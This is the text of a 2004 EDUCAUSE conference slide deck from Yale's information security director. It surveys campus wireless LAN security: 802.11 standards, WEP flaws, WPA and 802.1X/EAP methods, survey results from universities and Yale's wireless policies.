Effective Practices in Wireless Security for Higher Ed H. Morrow Long, CISSP, CISM Director - Information Security Yale University EDUCAUSE 2004 Annual

Effective Practices in Wireless Security for

Higher Ed H. Morrow Long, CISSP, CISM

Director - Information Security

Yale University

EDUCAUSE 2004 Annual ConferenceWednesday Oct 20, 2004, 2:15p-3:05p - Track 3 SessionMeeting Room 605 - Denver Colorado Convention Center Effective Practices

Working Group

Effective PracticesWorking Group

Copyright Notice

Copyright H. Morrow Long 2004. This work is the intellectual property of the author. Permission is granted for this material to be shared for non-commercial, educational purposes, provided that this copyright statement appears on the reproduced materials and notice is given that the copying is by permission of the author. To disseminate otherwise or to republish requires written permission from the author.


The Problem?

QuickTime™ and aTIFF (Uncompressed) decompressor

are needed to see this picture.








Yahoo Map! Of Yale

QuickTime™ and aNone decompressor



Yale Central & Science Campus Wireless Map


http://www.wifimaps.com/




Yale Medical Campus Wireless Map


http://www.intel.com/ca/personal/do_more/wireless/stories/bondar.htm

With more than 50 speaking engagements a year throughout North America and a career as a photographer that takes her around the world, Bondar, who was chosen to participate in the prestigious Women of Influence speakers series, carries her notebook PC, equipped with Intel® Centrino™ mobile technology+, everywhere she goes. On a recent visit to Yale University in Connecticut, Bondar says, "I used it on hospital rounds with neurosurgery residents." This is not your father's notebook, distinguished solely by portability. The built-in wireless technology allows unprecedented freedom.+ Among its attributes are mobility, of course, enhanced by a thin profile and lightweight components, longer battery life and uncompromised performance. A user within range of a wireless local area network (WLAN), or hotspot, has immediate high-speed access to the Internet and e-mail and can download or send text, data and graphics with ease. "Even five years ago," says Bondar, "wireless technology would have made a huge difference to my life."




WLAN Network Security Terminology Definitions

• VPN• Supranet• Internet• internet• intranet• extranet• ISP

• Firewall• WEP• SSL / TLS• Access Point• NAT Router• Bridge

• Encryption• Authenticati

on• PKI• LDAP• “Certificate”


Wireless Data – Terminology Definition

• IEEE 802.11a

• IEEE 802.11b

• IEEE 802.1x• IEEE

802.11e• IEEE

802.11g• IEEE 802.11i• Bluetooth• HomeRF• Jini

• EAP• LEAP• PEAP• EAP over

TLS• TTLS• WiFi• WPA


802.11 Wireless Standards

802.11 – 1 to 2 megabits/second.

802.11b – From 1 up to 11 megabits/second.

• Conflicts with frequency band used by Bluetooth.

802.11a supports data rates of 6 Mbps, 12 Mbps and 24 Mbps, 36 Mbps, 48 Mbps and 54 Mbps.

802.11e – multimedia & QoS improvements, security?

802.11g – 22Mbps and up to 54Mbps

802.1x - Auth. & port access ctl for all 802 LANs

WPA – 802.1X + EAP + TKIP + MIC

802.11i – WPA plus AES (Advanced Enc. Std)


802.11 Generic MAC layer - IBSS

IBSS (Independent Basic Service Set) - AKA “Ad-hoc” network. Stations associate directly with each other without an AP.No relaying, only direct (peer to peer).


802.11 Generic MAC layer - BSS

BSS (Basic Service Set) - AP plus stationsAKA “Infrastructure” network. Stations need AP to communicate w/each other and/or to relay packets out to internet. SSID may be broadcast via beacon frames.“Association” Request sent by client station to AP. Handshake to set up association may involve authentication.“Disassociate” Request may be sent at end of session (or may not be sent at all if station shuts down or moves out of range).


802.11 Generic MAC layer - ESS

ESS (Extended Service Set) - Multiple APs (each with multiple stations) connected (via wireless or wired LAN).AKA Extended “Infrastructure” network.ESS == Set of BSSs connected via a distribution system (DS). Shared SSID.Aps communicate among themselves.Entire WLAN is a single MAC layer 2 net.Station mobility within ESS. AP handoff.


802.11 PHY Specs

802.11 PHY Max Data Rate Frequency Modulation

802.11 2Mb/s 2.4Ghz &IR FHSS/DSSS

802.11b 11Mb/s 2.4Ghz DSSS

802.11g 22-54Mb/s 2.4Ghz OFDM

Super-G 108Mb/s 2.4Ghz OFDM

802.11a 54Mb/s 5Ghz OFDM


802.11b (WECA -> WiFi)

Most popular wireless LAN (WLAN).

11 Separate Channels in 2.4Ghz -- overlapping bands of frequencies.

Channels 1, 6 and 11 are commonly used as this allows three non-overlapping channels.


802.11b (WECA -> WiFi) & g

Most popular wireless LAN (WLAN).

11 Separate Channels in 2.4Ghz -- overlapping bands of frequencies.

Channels 1, 6 and 11 are commonly used as this allows three non-overlapping channels.


802.11a

Less popular wireless LAN (WLAN).

8 Non-overlapping Channels in the 5Ghz frequency range.

Was the only 54Mb/s WLAN until 802.11g -- which using compatible h/w, APs and frequency range.


Wireless Data Risks and Threats – What are we worried about?

Controlling Access to our Network Preventing intruders and disallowing anonymous access. Identifying and authenticating “trusted” users and devices. Authorization and network access control

Confidentiality Preventing eavesdropping and decryption to ensure privacy.

Integrity Preventing tampering and session hijacking.

Availability Ensuring quality of service, preventing denial of service.


Wireless Security Problems

Default Passwords

Open Broadcast of SSIDs

No or weak encryption.

Lack of authentication.

Accidental & Malicious association w/rogue APs (M-I-T-M tampering possible).

Sniffing

Spoofing

Denial of Service (DoS) Attacks

Attacks from outside: Spammers & Worms


Default SSID (Service Set Identifier)

Cisco ‘tsunami’

Linksys Aps ‘linksys’

Sent in beacon frames



Network Attacks (Spoofing and Denial of Service (DoS) Attacks) -- Layers 1 thru 3.Layer 1: Malicious AP overpowering a valid APLayer 2: Spanning Tree packet (802.1D) attacks. Broadcasts causing loops in redundant LANs.Layer 2: Attacks on EAP endpoints (spoofed start/logoff commands, bogus connect/failure msgs)Layer 3: ARP Cache Poisoning.Sending spoofed unsolicited ARP replies to computers to have them divert packets.


SSID Security Guidelines

Change the SSID from the vendor default.

Do not set the SSID to a secret (e.g. a password in use elsewhere) nor to anything which provides information to outsiders (e.g. company name).

Configure AP settings to not broadcast the SSID in beacon frames.


WLAN Security Guidelines

Use WEP to deter casual eavesdropping & trespassing.Use a VLAN & private IP subnet range outside of the corporate intranet.Firewall the WLAN from the corporate intranet.Require and use VPNs from stations to enter the corporate intranet.


802.11b Wireless Security Flaws

• Confidentiality - Interception / drive-by snooping

• WEP – Wired Equiv Privacy

• VPNs and App Level Crypto (SSL/TLS, SSH)

• Integrity - Impersonation

• ARP cache poisoning (spoofing wired/wireless)

• Session Hijacking

• Availability - Denial of service (DoS)

• Easy to jam with broad spectrum interference

• Some protection against electric appliances



• Authentication• MAC/Hardware Address Control• DHCP using registered MAC/HW addresses• Firewall plus VPN approach• Proprietary

• Cisco Aironet 350, Cisco driver and RADIUS• Web-based authentication

• Authorization - Appropriate Access Control• Access Point filters, NAT routers and Firewalls

• Accounting - Public 802.11b ISPs! Credit Cards.



802.11b has been criticized by UC Berkeley ISAAC group researchers as flawed:

http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html

At least one public domain program now is available on the Internet which will sniff WEP traffic and brute force reverse engineer the static key which is being used for encryption. Therefore WEP by itself is no longer considered secure to protect 802.11b traffic.



802.11b Access Points and networks were demonstrated as vulnerable to ARP cache poisoning by Cigital, Inc. in September 2001.

• Wireless PCs can be impersonated/traffic redirected.

• SSH and SSL sessions can be hijacked.

• Wired hosts can be impersonated and have their traffic redirected if the access point is attached to a wired LAN.

• Other wireless LANs attached to the same wired LAN are also susceptible to ARP cache poisoning.



Denial of Service

802.11b bandwidth degrades as single strength decreases (from 11mb to 1mb in increments).

802.11b frequency band conflicts with Bluetooth, wireless microphones, microwave ovens, etc.

802.11b supports multiple channels – can be used for noise/conflict avoidance, but not really useful for security (by obscurity).

Signal can be boosted at PC end by adding an antenna.

Amplifying signal reception at the AP increases noise.



Denial of Service

Yesterday’s CCA flaw/vulnerability in 802.11b.See the CERT announcement and

http://www.computerworld.com/securitytopics/security/story/0,10801,93221p4,00.htm


802.11b + 801.XWireless Security Flaws

University of Maryland researchers:

Arbaugh and Misra

Possible weaknesses:

• Session hijacking

• Man in the Middle (MitM) attacks


802.11b Confidentiality Solutions

WEP - To secure 802.11b using WEP (Wireless Equivalent Privacy) you need to (most sites don’t do these):

• Lock down MAC (physical Ethernet) addresses

• Set a network name (non-blank & non-guessable).

• Configure a static shared secret (or set of secrets).

• Change frequently.

• Purchase 64 or 128 bit cards & base units.

Non-WEP – Use appl. Level cryptography (SSL, etc.)

• Use and/or require VPNs


802.11b Integrity Solutions: Best Practices

Network Access Control

(Protect against ARP cache poisoning)

Don’t connect Wireless Access Points to the wired network

Put Wireless Access Points outside corporate firewall

Firewalling/filtering/blocking WLANs

Use NAT Router / Firewall Wireless Access Points

Use VLANs between wired and wireless networks

Use of Wireless VLANs to segregate


802.11b Availability Solutions

Note that wireless networks are susceptible to DoS attacks and have very limited shared bandwidth-- THEREFORE THEY ARE NOT SUITABLE REPLACEMENTS FOR A WIRED NETWORK when you need high reliability (e.g. Patient or animal subject RT monitoring).

That said, they can be a useful part of a BCP, Disaster Recovery strategy (Sept. 11, 2001 WTC cases) in the event of a wired network failure, for Internet access.

Suitable shielding may protect internal 802.11b nets.Intentional jamming may prevent 802.11b use…put outside external

shielding.Don’t use omni-directional antennas to decrease the spread of

signal, area of reception – particularly on P2P links.


802.11b Authentication / Authorization / Accounting Solutions

Use of VPNs over Wireless LANs Virtual Private Networks – PPTP, L2TP, IPSEC Username / Password, Hardware tokens, X.509 certificates.

Proprietary Secure Authentication Enhancements

• Cisco Aironet 350 enhances WEP with RADIUS userauthentication vs MAC address. Adds infinite number of WEP keys (vs. one –Apple-- or four -- Lucent).

Secure Web based authentication approaches


802.1X “Provides”

• Authentication (various methods)

• Port based access control

• NOT confidentiality (uses WEP)

• Can provide dynamic WEP key mgt

• (CISCO uses EAP to provide this)


802.11b + 802.1X “Fixes”

• Add MAC (Message Auth Check) to EAP and 802.11b mgt msgs

• Time sync communications between PC and Aps


WPA (WiFi Protected Access)

Forward compatible with IEEE 802.11i draft standard (except 802.11i adds AES encryption).

EAP (Extensible Access Protocol)

TKIP (Temporal Key Integrity Protocol)

MIC (Message Integrity Check)

802.1X (for auth and dynamic key exchange


WPA Operation

WPA will provide a TKIP encryption key to both PC and AP to provide secure session.

In absence of an authentication server (e.g. a home or small office network) WPA will use PREShared key mode (manual fixed password/key)

Legacy operation (old gear).


Requirements for WPA

WPA AP w/TKIP & 802.1X

WPA Client w/TKIP, 802.1X & EAP “supplicant” supporting auth method/server

Authentication server on network (e.g. RADIUS) w/strong EAP:

• TLS• TTLS• PEAP/LEAP


Comparison of WEP & WPA

WEP 40 bit static keys manually distributed Flawed or no authentication

WPA 128 bit dynamic keys automatically distributed w/ per

user/session/packet keys 802.1X and EAP authentication

WPA2 WPA2 is WPA plus AES (Advanced Encryption

Standard). It is 802.11i compliant.


Proprietary Wireless Security

Lucent (Orinoco) - Created first features:

1. “closed network” - Don’t broadcast SSID

(e.g. turn of AP broadcast ‘beacon frames’).

2. 128 bit WEP (WEP Plus - 40bits -> 104bits)

WEB key crack from days to 20 weeks

(but other WEP flaws bring time to 0)


Proprietary Wireless Security

CISCO (340/350/…) - features:

Dynamically Generated Short-lived (Broadcast) WEP keys

(in an early firmware release)


Non-Proprietary Wireless Security

MAC Address Filtering

Description:Register Physical Addresses of authorized devices

Flaws:1. Must be registered in list in AP or in a server (e.g.

special RADIUS server).2. Physical Addresses can easily be spoofed.



VPN (with or without filtering/blocking of non-VPN traffic)

Description:Tunnel all wireless traffic through VPN sessions. Require VPN connection to a specific VPN server.Provides CIA (Confidentiality, Integrity & Auth).

VPN (PPTP, L2TP, IPSEC) choice.

Potential Flaws:1. Redundant encryption (if also using WEP).2. Bandwidth hog / latency problem.



802.1X -- Extensible Authentication Protocol Designed for wired AND wireless LANs.Can filter or enable ports and/or MAC addresses on switches and APs.Not a cipher.Not a single authentication method: EAP-MD5 EAP-Cisco Wireless (aka LEAP) EAP-TLS (Microsoft, RFC2716) EAP-TTLS PEAP (Microsoft and Cisco) EAP-SIM proposal (use GSM SIM cards)



802.1X -- EAP Authentication “bucket”

EAP-MD5

Description:MD5 Hashing of user/pass creds -- pass to RADIUS

Flaws:No key mgt -- uses static WEP keys.




EAP-CISCO WIRELESS (LEAP)

Description:Username/ password credentials-- passed to RADIUS

Benefits

generates one-time WEP keys for each sessioncan use RADIUS timeout features to nullify current WEP attacks,prevents rogue AP association attacks(by mutual auth requirement)

Flaws or Drawbacks:Needs special 802.11b driver to support LEAP




EAP-TLS (Microsoft, RFC2716)

Description:

uses X.509 certs for auth, uses SSL/TLS to pass the PKI info

Benefitsgenerates one-time WEP keys for each session ala LEAP.

Flaws or Drawbacks:Needs special 802.11b driver (clients). special clients are available for some Linux distros and all non-CE Windows).

Drawback -- requires a PKI & certs. Microsoft Certificate Server and AD LDAP server can be used in an Active Directory

Environment.




PEAP (Microsoft and Cisco)

Description:

Similar to EAP-TLS but uses username/password rather than certs. uses SSL/TLS to pass the credentials

Benefitsgenerates one-time WEP keys for each session ala LEAP.PKI and user certificate is not required.

Flaws or Drawbacks:Needs special 802.11b driver (clients). special clients are available -- particularly for Windows XP SP1.


Proprietary Wireless Security Systems

ArubaBlueSocketEcutelReefEdgeVernier


SurveyWhich WLAN security modes are you using (check all

that apply):1. None2. MAC Address Filtering3. Application Level (SSL)4. VPN5. Proprietary6. WEP7. WPA8. 802.1x9. 802.11i10. EAP

EAP Modes:

A. EAP-MD5

B. LEAP (Cisco)

C. EAP-TLS (Microsoft, RFC2716)

D. PEAP (Microsoft, Cisco)

E. Other EAP (EAP-SIM, TTLS)


# of Respondents with WiFi Access?

Yes No

02468

101214

16


Publish Campus WiFi Information on Web?

0

2

4

6

8

10

YesNo

Yes 9 10

No 6 5

SSID? Hotspot Map?


Campus WLAN Mode

0

5

10

15

112

4

IBSS BSS ESS


# WiFi WLAN Standards implemented

0

5

10

15

YesNo

Yes 4 15 7 0

No 12 1 8 15

802.11a 802.11b 802.11g Super-G


WiFi Encryption / Authentication Modes

0

5

10

15

Yes

No

Yes 10 1 7

No 5 14 8

WEP WPA 802.1X


801.X Authentication Protocols Implemented

0

2

4

6

8

10

12

14

16

EAP-MD5

LEAP(Cisco)

PEAP EAP-TLS TTLS

YesNo


Commercial Secure WiFi Vendor Implementations

0

5

10

15

Implemented 1

No 13

Evaluating 1

BlueSocket

Perfigo Eval

None


WLAN / Campus Network Topology Independence

0

2

4

6

8

10

12

Yes 12 5 6 9

No 3 10 9 6

WLAN VLAN

Private IP

Non-campus

Campus Public


Net Sec Access Control--Firewall between WLAN &

0

2

4

6

8

10

12

YesNoNot Yet

Yes 4 8

No 11 6

Not Yet 0 1

Campus Net Internet


VPN Session Required from WLAN to connect to:

02

4

6

810

12

YesNoNot Yet

Yes 2 3

No 12 12

Not Yet 1 0

Outside of WLAN

Campus Net


WLAN Data Link LayerSecurity Protections

0

5

10

15

Yes 6 2 3 5

No 9 13 12 9

Not Yet 0 0 0 1

MAC ACLs

Anti Spoof

Private SSID

No ID Bcast


WLAN Security Counter-Measures

0

5

10

15

Yes 5 0

No 10 15

Force WAP Associations

Jamming Capability


WLAN Authentication 1

0

5

10

15

Yes 1 8 6 6

No 14 7 9 8

Not Yet 0 0 0 1

Allow Unauth

NetRegDHCP

Web Logon

802.1X Logon


WLAN Authentication 2

0

0.5

1

1.5

2

Yes 1 0 2

X.509 Certs SmartCard VPN Auth


WEP/WPA Encryption

0 5 10 15 20

WEP 40 Static

WEP > 64 Static

WEP 40 Dynamic

WEP > 64 Dynamic

WPA 128 Static

WPA 128 & 802.1X

Not YetNoYes


Encryption Requirement by WLAN Protocol Layer

0

2

4

6

8

Don't Care 5 4 5 5 5

Recommend 6 6 2 2 2

Require 2 3 5 5 5

Application

Session Transport

Network

Data Link


WLAN Policies 1

0

2

4

6

8

Yes 8 6

No 7 7

N / A 0 2

RF Airspace Reserved

Require Non-IT WAP Stds


WLAN Policies 2 - Allow WLANs outside IT?

0

2

4

6

8

10

12

Yes 5 4 3

No 10 11 12

Non-IT Dept WAPs

Faculty WAPs

Student WAPs


Interesting or Unique Practices and Findings

Not all devices support > 64 bit WEP so 40 bit must often be used.

A few campuses are moving from Cisco LEAP to PEAP or EAP-TLS.

Rutgers is using BlueSocket:http://ruwireless.rutgers.edu/

Dartmouth has widespread WiFi and VoIP over WiFi.

Several campuses use NoCat for both wired and wireless authentication (and thereby enable access).


More Interesting/Unique Practices and Findings

Companies are marketing for-pay public WiFi access points which you can hang off of any high speed Internet connection. These boxes allow users passing by to associate and pay for access by credit card. Look for students to try to make $$$?


Other Interesting/Unique Practices and Findings?


Yale University - Unwritten Wireless Policy

Do no harm: Private Wireless Access Points which cause network disruption at Yale will be removed from the network (this includes causing interference by overlapping RF channels, etc). Use of WEP or WPA is encouraged.Private Access Points should not use the Yale SSID.WiFi users are encouraged to use the VPN to access critical apps or sensitive information.Yale Administrative users should not use WiFi to replace wired LAN connections.The above admin apps should already however be using application level security on wired networks.


Yale School of MedicineWireless Policy Points

All private WAPS need to be registered. The default SSID must be changed to something other than Yale’s and the default passwords must be changed.

The WAP must only allow WEP and should implement MAC address filtering.

It should be turned off if/when not used.


Yale School of MedicineWireless Policy Points

Official YSM WiFi Security :ePHI should not be transferred unencrypted.YSM ITS WLANs are changing from VPN (either

PPTP or IPSEC) recommended to required. DHCP will vend a RFC1918 private IIP to the YSM WLAN. Users must authenticate to the VPN and use it to connect to any resources outside of the WLAN.

Clients w/o registered MAC addresses or valid VPN sessions attempting HTTP connections to

Addresses outside the WLAN VLAN are redirected to a web portal where documentation and software are available (but little else).


Wireless Data Risks and Threats – What are we worried about?

Controlling Access to our Network Preventing intruders and disallowing anonymous access. Identifying and authenticating “trusted” users and devices. Authorization and network access control

Confidentiality Preventing eavesdropping and decryption to ensure privacy.

Integrity Preventing tampering and session hijacking.

Availability Ensuring quality of service, preventing denial of service.



Default Passwords

Open Broadcast of SSIDs

No or weak encryption.

Lack of authentication.

Accidental & Malicious association w/rogue APs (M-I-T-M tampering possible).

Sniffing

Spoofing

Denial of Service (DoS) Attacks (Dis-association, Jamming)

Attacks from outside: Spammers & Worms



Network Attacks (Spoofing and Denial of Service (DoS) Attacks) -- Layers 1 thru 3.Layer 1: Malicious AP overpowering a valid APLayer 2: Spanning Tree packet (802.1D) attacks. Broadcasts causing loops in redundant LANs.Layer 2: Attacks on EAP endpoints (spoofed start/logoff commands, bogus connect/failure msgs)Layer 3: ARP Cache Poisoning.Sending spoofed unsolicited ARP replies to computers to have them divert packets.


WiFi Security Pre-WPA/802.11iGuidelines for Enterprise IT

Disable SSID broadcasts & use non-obvious SSIDUse WEP.Use a separate VLAN & private IP net for WLAN.Firewall WLAN off from the corporate intranet.Require of use VPN to enter the corporate intranet.Use MAC Address filtering -- block nonregisteredForce client association -- to known SSIDMonitor airspace -- war-walk/chalk/drive/run AND look into WiFi perimeter protection products and systems.Use 802.1X Layer 2 Authentication with EAP & RADIUS


WPA (WiFi Protected Access)

Forward compatible with IEEE 802.11i draft standard (except 802.11i adds AES encryption).

EAP (Extensible Access Protocol)

TKIP (Temporal Key Integrity Protocol)

MIC (Message Integrity Check)

802.1X (for auth and dynamic key exchange


What WPA and 802.11i Provide:

Strong integrity.

Strong encryption Particularly AES vs. WEP encryption

implementation Dynamic Key Generation/Re-generation

Strong authentication capability (w/802.1X/EAP).

Increased DoS (Denial of Service) protection - particularly against Dis-association attacks


What is WPA2?WPA2 == 802.11iWPA2 & 802.11i include AESWPA2 is basically (WPA + AES).WPA does not and it uses TKIP. WPA IS secure.AES meets FIPS 140-2 (req’d by some Gov’t agencies).AES can require new hardware or hardware upgrades as it can require a new dedicated crypto chip.Several WiFi vendors are now ‘WPA2” compliant:


Conclusions

Few using WEP, some are now starting to evaluate WPA (and wait for 802.11i).Some use of commercial solutions (Vernier, Aruba, some ReefEdge and BlueSocket)?Some interest is beginning in ‘network admissions’ (require both authentication and a network scan ala UCONN NetReg mods) programs for both wired and wireless LANs:Cisco, Perfigo, StillSecure and Bradford Campus Manager.


Questions

Documents

Effective Practices in Wireless Security for Higher Ed H. Morrow Long, CISSP, CISM Director - Information Security Yale University EDUCAUSE 2004 Annual